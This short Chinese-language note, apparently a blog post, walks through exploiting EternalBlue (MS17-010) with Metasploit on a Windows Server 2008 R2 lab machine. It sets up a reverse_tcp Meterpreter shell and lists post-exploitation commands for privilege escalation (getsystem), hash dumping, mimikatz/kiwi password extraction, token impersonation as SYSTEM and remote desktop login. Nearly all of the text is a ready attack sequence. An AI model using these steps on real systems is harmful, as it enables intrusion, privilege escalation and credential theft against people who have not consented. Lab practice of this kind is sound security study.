MSF - 永恒之蓝ms17漏洞利用 环境:windows server 2008 R2 第一步、搜索ms17-010的漏洞辅助扫描工具 第二步、use该辅助模块 第三步、设置攻击参数,Rhost这是攻击主机的ip地址,永恒之蓝就是攻击445端口 第四步、搜索exploit关于ms17-010,然后找到永恒之蓝 第五步、找payload,windows反连payload 也就是windows/meterpreter/reverse_tcp 第一次尝试,虚拟机挂了 第二次尝试成功 建议会话之后的命令使用 getlwd – 显示本地工作目录 ipconfig --显示网络接口信息 ps --列出正在运行的程序 migrate – 根据ps查看的pid可以任意迁移平行权限和下行权限 sysinfo --获取远程系统有关信息 提权和密码命令 getsystem(尝试简单提权) hashdump(获取hash密码) screenshot (获取远程桌面图片) shell(感觉比较实用的一个了) mimikatz(被换了个名字kiwi)抓取管理员账号和密码方式 load -l (查看可用模块) 使用命令(kiwi_cmd sekurlsa::logonpasswords) 远程CMD命令执行 execute -f cmd -c 木马模式调到后台执行 background 木马调回前台 session -l 令牌操纵 use incognito #heip incognito 查看帮助 list_tokens -u 查看可用的token impersonate_token “伪造的身份” #假冒token 或者 举个例子:impersonate_token NT AUTHORITY\SYSTEM #不加单引号 需使用\ execute -f cmd.exe -i –t # -t 使用假冒的token 执行 或者直接shell 登陆靶机电脑 rdesktop -u 用户名 -p 密码 登陆ip地址